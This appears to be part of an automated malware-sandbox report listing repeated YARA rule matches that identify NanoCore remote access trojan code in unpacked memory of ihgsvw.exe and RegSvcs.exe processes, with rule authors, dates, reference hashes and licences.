      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
